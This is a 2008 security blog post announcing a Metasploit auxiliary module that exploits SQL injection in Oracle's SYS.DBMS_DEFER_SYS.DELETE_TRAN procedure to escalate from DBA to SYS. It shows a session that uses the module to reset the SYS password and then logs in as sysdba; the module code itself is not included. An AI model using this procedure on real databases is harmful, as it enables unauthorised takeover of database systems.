Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:

The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

------------------------------ ------------------------------ --- --- ---

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@ as sysdba

SQL*Plus: Release - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release - Production
With the Partitioning, OLAP and Data Mining options


select user from dual;



Tested on 9i and 10g release 1

codez available here:

It's definitely a work in progress, so if you have feedback, send it.

1 comment: